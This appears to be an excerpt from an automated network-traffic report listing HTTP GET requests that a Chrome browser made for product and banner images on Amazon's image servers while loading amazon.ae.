Source: global trafficHTTP traffic detected: GET /images/I/412CLCbp2pL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/31Lxe89wp8L._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/416l24m+1oL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41Zp3xaXvPL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/31+4pNVeyCL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/412CLCbp2pL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41C6hPvag5L._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41Zp3xaXvPL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/31+4pNVeyCL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41E6wo15qgL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/317I8lSNZAL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41C6hPvag5L._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/21nsiubzhVL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/317I8lSNZAL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41E6wo15qgL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41tYpVlGR4L._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/31AGMSYB+OL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/21nsiubzhVL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41WmXJZiubL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/VAS_MENA/2024/GW/QC/Furniture/XCM_CUTTLE_ORIGIN_1707658_3701318_186x116_1X_en_AE_Version_3._SY116_CB561430975_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610033_186x116_1X_en_AE._SY116_CB582137121_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/31AGMSYB+OL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610032_186x116_1X_en_AE._SY116_CB582137121_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41tYpVlGR4L._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-YjI1NWNkYTQt-w379._SY304_CB641947165_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07s96bn4y_379x304_ae-en._SY116_CB623271922_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610035_186x116_1X_en_AE._SY116_CB582137121_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/31aozKg0dqL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/51Q42KWVMgL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/31zt7qzs+xL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41WmXJZiubL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07ns817nh_379x304_ae-en._SY116_CB623271885_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07nsb535l_379x304_ae-en._SY116_CB623271922_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b077n51cr2_379x304_ae-en._SY116_CB623271922_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07yk48157_379x304_ae-en._SY116_CB623005781_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07fsr5k7g_379x304_ae-en._SY116_CB623005785_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcar_b07pcm7ds2_379x304_ae-en._SY116_CB623005780_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61oyKtHlCaL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/31aozKg0dqL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/31zt7qzs+xL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/51Q42KWVMgL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81fZHA1dDhL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61kA0-m5lcL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
